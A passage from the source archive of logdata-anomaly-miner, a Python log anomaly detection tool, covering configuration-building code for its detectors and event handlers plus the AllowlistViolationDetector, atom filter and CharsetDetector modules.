exclude_due_distr_lower_limit=item['exclude_due_distr_lower_limit'], match_disc_distr_threshold=item['match_disc_distr_threshold'], used_cor_meth=item['used_cor_meth'], used_validate_cor_meth=item['used_validate_cor_meth'], validate_cor_cover_vals_thres=item['validate_cor_cover_vals_thres'], validate_cor_distinct_thres=item['validate_cor_distinct_thres'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn, 
log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'PathValueTimeIntervalDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], ignore_list=item['ignore_list'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], time_period_length=item['time_period_length'], max_time_diff=item['max_time_diff'], num_reduce_time_list=item['num_reduce_time_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'PathArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], output_logline=item['output_logline'], learn_mode=learn, num_init=item['num_init'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], alpha=item['alpha'], alpha_bt=item['alpha_bt'], num_results_bt=item['num_results_bt'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_periods_tsa_ini=item['num_periods_tsa_ini'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'TSAArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], waiting_time=item['waiting_time'], num_sections_waiting_time=item['num_sections_waiting_time'], target_path_list=item['paths'], acf_pause_interval_percentage=item['acf_pause_interval_percentage'], acf_auto_pause_interval=item['acf_auto_pause_interval'], acf_auto_pause_interval_num_min=item['acf_auto_pause_interval_num_min'], build_sum_over_values=item['build_sum_over_values'], num_periods_tsa_ini=item['num_periods_tsa_ini'], num_division_time_step=item['num_division_time_step'], alpha=item['alpha'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_results_bt=item['num_results_bt'], alpha_bt=item['alpha_bt'], acf_threshold=item['acf_threshold'], round_time_interval_threshold=item['round_time_interval_threshold'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], min_log_lines_per_time_step=item['min_log_lines_per_time_step'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MinimalTransitionTimeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], target_path_list=item['paths'], id_path_list=item['id_path_list'], ignore_list=item['ignore_list'], allow_missing_id=item['allow_missing_id'], num_log_lines_solidify_matrix=item['num_log_lines_solidify_matrix'], time_output_threshold=item['time_output_threshold'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], 
stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time'], anomaly_threshold=item['anomaly_threshold']) elif item["type"].name in ("VerboseUnparsedAtomHandler", "SimpleUnparsedAtomHandler"): has_unparsed_handler = True stop_when_handled_flag = True if item["type"].name == "VerboseUnparsedAtomHandler": tmp_analyser = func(anomaly_event_handlers, parsing_model) else: tmp_analyser = func(anomaly_event_handlers) analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.subhandler_list[0] = (tmp_analyser, stop_when_handled_flag) continue else: tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn) if item['output_event_handlers'] is not None: tmp_analyser.output_event_handlers = item['output_event_handlers'] analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.add_handler(tmp_analyser, stop_when_handled_flag=stop_when_handled_flag) add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) def add_default_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model): """Add the default unparsed atom handler and/or NewMatchPathDetector if none is configured.""" if not has_unparsed_handler: from aminer.analysis.UnparsedAtomHandlers import VerboseUnparsedAtomHandler atom_filter.add_handler(VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model), stop_when_handled_flag=True) has_unparsed_handler = True if not has_new_match_path_handler: has_new_match_path_handler = True if 'LearnMode' in yaml_data: learn = yaml_data['LearnMode'] else: learn = True from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector nmpd = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn) nmpd.output_event_handlers = None 
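        analysis_context.register_component(nmpd, component_name='DefaultNewMatchPathDetector')
        atom_filter.add_handler(nmpd)
    return has_new_match_path_handler, has_unparsed_handler


def build_event_handlers(analysis_context, anomaly_event_handlers):
    """Build the event handlers listed under the ``EventHandlers`` key of the module-level ``yaml_data``.

    Every configured handler is instantiated through ``item['type'].func``, optionally wrapped in a JsonConverterHandler and/or a
    ScoringEventHandler, and appended to anomaly_event_handlers.

    @param analysis_context the AnalysisContext handed to every handler constructor.
    @param anomaly_event_handlers list that receives the constructed handler chains (mutated in place).
    @return the list of configured handler ids, or None when nothing was configured (or a required config key was missing, see the
    KeyError fallback at the end) and a StreamPrinterEventHandler writing to stderr was installed instead.
    @raise ValueError when a handler id occurs twice or a Kafka cfgfile does not exist / is not readable.
    """
    import os
    import stat
    try:
        event_handler_id_list = []
        if 'EventHandlers' in yaml_data and yaml_data['EventHandlers'] is not None:
            for item in yaml_data['EventHandlers']:
                if item['id'] in event_handler_id_list:
                    raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in EventHandlers!')
                event_handler_id_list.append(item['id'])
                func = item['type'].func
                ctx = None
                if item['type'].name == 'StreamPrinterEventHandler':
                    if 'output_file_path' in item:
                        try:
                            # 'w+' truncates an existing regular file; a FIFO is opened write-only instead (opening a FIFO for
                            # writing presumably blocks until a reader is attached). The stream is deliberately kept open for
                            # the lifetime of the handler, so no context manager is used here.
                            mode = 'w+'
                            if os.path.exists(item['output_file_path']) and stat.S_ISFIFO(os.stat(item['output_file_path']).st_mode):
                                mode = 'w'
                            stream = open(item['output_file_path'], mode)
                            ctx = func(analysis_context, stream)
                        except OSError as e:
                            # Report the failure but keep going: ctx stays None, so the handler is built without a stream below
                            # instead of aborting the whole configuration.
                            msg = f'Error occured when opening stream to output_file_path {item["output_file_path"]}. Error: {e}'
                            logging.getLogger(DEBUG_LOG_NAME).error(msg)
                            print(msg, file=sys.stderr)
                    else:
                        ctx = func(analysis_context)
                if item['type'].name == 'DefaultMailNotificationEventHandler':
                    ctx = func(analysis_context)
                if item['type'].name == 'SyslogWriterEventHandler':
                    ctx = func(analysis_context, item['instance_name'])
                if item['type'].name == 'KafkaEventHandler':
                    import configparser
                    config = configparser.ConfigParser()
                    # os.access() only serves to produce a clear error message; ConfigParser.read() itself silently skips files
                    # it cannot open, which would otherwise yield an empty option set.
                    if os.access(item['cfgfile'], os.R_OK):
                        config.read(item['cfgfile'])
                    else:
                        msg = f'{item["cfgfile"]} does not exist or is not readable'
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        raise ValueError(msg)
                    options = dict(config.items("DEFAULT"))
                    # Values that look numeric are converted to int (presumably for options such as ports and timeouts).
                    # Credentials must stay strings even when they consist of digits only, so both SASL PLAIN fields are
                    # excluded; the previous code only excluded the username and turned an all-digit password into an int.
                    for key, val in options.items():
                        if key in ("sasl_plain_username", "sasl_plain_password"):
                            continue
                        try:
                            options[key] = int(val)
                        except ValueError:
                            pass
                    ctx = func(analysis_context, item['topic'], options)
                if item['type'].name == 'ZmqEventHandler':
                    # if topic is "None" zmq will send messages without using any topic
                    if 'topic' not in item:
                        item['topic'] = None
                    ctx = func(analysis_context, item['topic'], item['url'])
                if ctx is None:
                    # Any type not handled above, or a StreamPrinterEventHandler whose output file could not be opened.
                    ctx = func(analysis_context)
                if item['json'] is True or item['type'].name == 'KafkaEventHandler' or item['type'].name == 'ZmqEventHandler':
                    # Kafka and ZMQ transports always carry JSON; for the others it is opt-in via the 'json' flag.
                    from aminer.events.JsonConverterHandler import JsonConverterHandler
                    ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=item['pretty'] is True)
                if item['score']:
                    from aminer.events.ScoringEventHandler import ScoringEventHandler
                    ctx = ScoringEventHandler([ctx], analysis_context, weights=item['weights'], auto_weights=item['auto_weights'],
                                              auto_weights_history_length=item['auto_weights_history_length'])
                anomaly_event_handlers.append(ctx)
            return event_handler_id_list
        raise KeyError()
    except KeyError as e:
        # Add stdout stream printing for debugging, tuning.
        # NOTE(review): this also catches a KeyError caused by a missing key in a configured handler item (e.g. 'json' or
        # 'pretty'), in which case the configured handlers are silently replaced by the stderr printer. The reason is logged
        # at debug level so a misconfiguration is at least traceable.
        logging.getLogger(DEBUG_LOG_NAME).debug("No usable EventHandlers configuration (%r); falling back to stderr output.", e)
        from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
        anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context, stream=sys.stderr))
    return None


def tuple_transformation_function_demo_print_every_10th_value(match_value_list):
    """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.

    Demo transformation function: it toggles learn_mode on the module-level
    ``enhanced_new_match_path_value_combo_detector_reference`` (expected to be set elsewhere in this file) so that the detector
    reports a known combination only when its occurrence counter (index 2 of the stored extra data) is about to reach a multiple
    of 10.

    @param match_value_list the extracted value combination; returned unchanged.
    """
    extra_data = enhanced_new_match_path_value_combo_detector_reference.known_values_dict.get(tuple(match_value_list), None)
    if extra_data is not None:
        mod = 10
        if (extra_data[2] + 1) % mod == 0:
            enhanced_new_match_path_value_combo_detector_reference.learn_mode = False
        else:
            enhanced_new_match_path_value_combo_detector_reference.learn_mode = True
    return match_value_list


def parse_json_yaml(json_dict, parser_model_dict):
    """Parse a yaml configuration for json.

    Recursively translate the YAML description of a JSON document into a dictionary of parser models: nested dicts recurse,
    lists may hold dicts, the special markers ALLOW_ALL / EMPTY_ARRAY / EMPTY_OBJECT / NULL_OBJECT, or parser model names, and
    scalar values are either one of those markers or a parser model name looked up in parser_model_dict.

    @param json_dict the YAML structure describing the JSON keys.
    @param parser_model_dict mapping of parser model name to parser model object.
    @return a dictionary with the same key structure whose leaves are parser models or marker strings.
    @raise ValueError when a referenced parser model does not exist or ALLOW_ALL is combined with other list entries.
    """
    key_parser_dict = {}
    for key in json_dict.keys():
        value = json_dict[key]
        # YAML parses the bare words null/false/true into Python objects; map them back to their JSON key spelling.
        if key is None:
            key = 'null'
        if key is False:
            key = 'false'
        if key is True:
            key = 'true'
        if isinstance(value, dict):
            key_parser_dict[key] = parse_json_yaml(value, parser_model_dict)
        elif isinstance(value, list):
            key_parser_dict[key] = []
            for val in value:
                if isinstance(val, dict):
                    key_parser_dict[key].append(parse_json_yaml(val, parser_model_dict))
                elif val in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"):
                    if len(value) > 1 and val == "ALLOW_ALL":
                        msg = "ALLOW_ALL must not be combined with other parsers in lists."
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        raise ValueError(msg)
                    # A marker inside a list replaces the whole list entry with the original list.
                    key_parser_dict[key] = value
                elif parser_model_dict.get(val) is None:
                    msg = f'The parser model {val} does not exist!'
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
                else:
                    key_parser_dict[key].append(parser_model_dict.get(val))
        elif value in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"):
            key_parser_dict[key] = value
        elif parser_model_dict.get(value) is None:
            msg = f'The parser model {value} does not exist!'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        else:
            key_parser_dict[key] = parser_model_dict.get(value)
    return key_parser_dict
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py000066400000000000000000000000001500476301700313020ustar00rootroot00000000000000
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/000077500000000000000000000000001500476301700310265ustar00rootroot00000000000000
AllowlistViolationDetector.py000066400000000000000000000102311500476301700366470ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines a detector for log atoms not matching any allowlisted rule.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, DEBUG_LOG_NAME
from aminer import AminerConfig
from aminer.analysis.Rules import MatchRule


class AllowlistViolationDetector(AtomHandlerInterface):
    """Objects of this class handle a list of allowlist rules.

    They ensure, that each received log-atom is at least covered by a single allowlist rule. To avoid traversing the complete rule
    tree more than once, the allowlist rules may have match actions attached that set off an alarm by themselves.
    """

    def __init__(self, aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True, log_resource_ignore_list=None):
        """Initialize the detector.

        @param aminer_config configuration from analysis_context (used for the log line prefix when reporting).
        @param allowlist_rules list of rules executed until the first rule matches.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param output_logline accepted for interface compatibility; this detector always reports the raw log line.
        @param log_resource_ignore_list list of resource names whose atoms are not analysed.
        @raise TypeError when allowlist_rules is None or contains an object that is not a MatchRule.
        """
        super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, output_logline=output_logline,
                         allowlist_rules=allowlist_rules, log_resource_ignore_list=log_resource_ignore_list,
                         mutable_default_args=["log_resource_ignore_list"])
        # Only None is rejected here; an empty list is accepted and will then flag every received atom.
        if allowlist_rules is None:
            msg = "allowlist_rules must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        for path in self.allowlist_rules:
            if not isinstance(path, MatchRule):
                msg = "allowlist_rules values must be of the type MatchRule."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)

    def receive_atom(self, log_atom):
        """Receive a parsed atom and the information about the parser match.

        @param log_atom atom with parsed data to check; it is expected to carry a parser_match, which is dereferenced when no rule
        matches.
        @return True if the log atom matches one of the rules, False if it was ignored or reported as not allowlisted.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        self.log_total += 1
        event_data = {}
        for rule in self.allowlist_rules:
            if rule.match(log_atom):
                self.log_success += 1
                return True
        original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        try:
            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            # Undecodable input is reported in its escaped repr form rather than dropped.
            data = repr(log_atom.raw_data)
        analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary()),
                              "AffectedLogAtomValues": [data]}
        sorted_log_lines = [original_log_line_prefix + data]
        event_data["AnalysisComponent"] = analysis_component
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", "No allowlisting for current atom", sorted_log_lines,
                                   event_data, log_atom, self)
        return False

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        Besides the base class statistics, every rule logs its own statistics under "<component_name>.<RuleClass><index>".

        @param component_name the name of the component which is printed in the log line.
        """
        super().log_statistics(component_name)
        for i, rule in enumerate(self.allowlist_rules):
            rule.log_statistics(component_name + "." + rule.__class__.__name__ + str(i))
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/AtomFilters.py000066400000000000000000000130351500476301700336330ustar00rootroot00000000000000
"""This file collects various classes useful to filter log atoms and pass them to different handlers.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.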
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.input.InputInterfaces import AtomHandlerInterface


class SubhandlerFilter(AtomHandlerInterface):
    """Handlers of this class pass the received atoms to a list of atom handlers."""

    def __init__(self, subhandler_list, stop_when_handled_flag=False):
        """Initialize the filter.

        @param subhandler_list list of (handler, stop_flag) tuples; each handler implements the AtomHandlerInterface. Processing
        runs through the whole list unless a handler that accepted the atom was registered with stop_flag True.
        @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom.
        """
        super().__init__(
            mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag)

    def add_handler(self, atom_handler, stop_when_handled_flag=False):
        """Append a handler to the end of the subhandler list.

        @param atom_handler an object implementing the AtomHandlerInterface.
        @param stop_when_handled_flag True, if processing should stop once this handler accepted the log atom.
        """
        entry = (atom_handler, stop_when_handled_flag)
        self.subhandler_list.append(entry)

    def receive_atom(self, log_atom):
        """Pass the atom to the subhandlers in registration order.

        A handler counts as successful only when it returns exactly True; a stop flag is honoured only after such a success.
        @return False when no subhandler was able to handle the atom, True otherwise.
        """
        self.log_total += 1
        any_handled = False
        for handler, stop_here in self.subhandler_list:
            if handler.receive_atom(log_atom) is not True:
                continue
            any_handled = True
            self.log_success += 1
            if stop_here:
                break
        return any_handled


class MatchPathFilter(AtomHandlerInterface):
    """This class just splits incoming matches according to existence of paths in the match."""

    def __init__(self, parsed_atom_handler_lookup_list, default_parsed_atom_handler=None):
        """Initialize the filter.

        @param parsed_atom_handler_lookup_list contains tuples with search path string and handler. When the handler is None, the
        filter will just drop a received atom without forwarding.
        @param default_parsed_atom_handler invoke this handler when no handler was found for given match path or do not invoke
        any handler when None.
        """
        super().__init__(
            parsed_atom_handler_lookup_list=parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler)

    def receive_atom(self, log_atom):
        """Forward the atom to the handler of the first lookup path present in the match dictionary.

        The first matching lookup entry wins even when its handler is None (the atom is then dropped but still counted as
        success). Without any matching path the default handler is used, if configured.
        @return False when log_atom did not contain match data or was not forwarded to any handler, True otherwise.
        """
        self.log_total += 1
        parser_match = log_atom.parser_match
        if parser_match is None:
            return False
        present_paths = parser_match.get_match_dictionary()
        chosen = next(((path, handler) for path, handler in self.parsed_atom_handler_lookup_list if path in present_paths), None)
        if chosen is None:
            handler = self.default_parsed_atom_handler
            if handler is None:
                return False
        else:
            handler = chosen[1]
        if handler is not None:
            handler.receive_atom(log_atom)
        self.log_success += 1
        return True


class MatchValueFilter(AtomHandlerInterface):
    """This class just splits incoming matches using a given match value and forward them to different handlers."""

    def __init__(self, target_path, parsed_atom_handler_dict, default_parsed_atom_handler=None):
        """Initialize the splitter.

        @param target_path the path to be analyzed in the parser match of the log atom.
        @param parsed_atom_handler_dict a dictionary of match value to atom handler.
        @param default_parsed_atom_handler invoke this default handler when no value handler was found or do not invoke any
        handler when None.
        """
        super().__init__(target_path=target_path, parsed_atom_handler_dict=parsed_atom_handler_dict,
                         default_parsed_atom_handler=default_parsed_atom_handler)

    def receive_atom(self, log_atom):
        """Dispatch the atom on the match_object found at target_path.

        When target_path is absent, the dictionary is looked up with the key None, so a handler registered under None acts as
        the handler for "value missing".
        @return False when the atom carries no parser match or no handler (including the default) applies, True otherwise.
        """
        self.log_total += 1
        if log_atom.parser_match is None:
            return False
        match_element = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        lookup_key = None if match_element is None else match_element.match_object
        handler = self.parsed_atom_handler_dict.get(lookup_key, self.default_parsed_atom_handler)
        if handler is None:
            return False
        handler.receive_atom(log_atom)
        self.log_success += 1
        return True
CharsetDetector.py000066400000000000000000000325571500476301700344160ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines a detector for value character sets.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
""" import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class CharsetDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list specifies group identifiers for which data should be learned/analyzed. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence file. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. 
@param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, learn_mode=learn_mode, id_path_list=id_path_list, persistence_id=persistence_id, stop_learning_time=stop_learning_time, output_logline=output_logline, ignore_list=ignore_list, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, target_path_list=target_path_list, constraint_list=constraint_list, log_resource_ignore_list=log_resource_ignore_list ) # Persisted data stores characters as bytes for each id, i.e., [[[], []], ...]] self.charsets = {} self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time parser_match = 
log_atom.parser_match if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return False # Store all values from target paths in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if not isinstance(match.match_object, bytes): value = str(match.match_object).encode(AminerConfig.ENCODING) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values has new characters for a specific id path. 
if id_event in self.charsets: missing_chars = set() for c in b"".join(values): if c not in self.charsets[id_event]: missing_chars.add(c) if len(missing_chars) > 0: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] missing_chars_decoded = [] for character in missing_chars: missing_chars_decoded.append(character.to_bytes(1, "big").decode(AminerConfig.ENCODING)) affected_values = [] for value in values: affected_values.append(value.decode(AminerConfig.ENCODING)) analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_values, "MissingCharacters": missing_chars_decoded} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New character(s) detected", sorted_log_lines, event_data, log_atom, self) # Extend charsets if learn mode is active. 
if self.learn_mode: self.charsets[id_event].update(missing_chars) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: self.charsets[id_event] = set(b"".join(values)) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for id_ev, charset in self.charsets.items(): lst.append([id_ev, list(charset)]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for lst in persistence_data: self.charsets[tuple(lst[0])] = set(lst[1]) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. 
""" if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. 
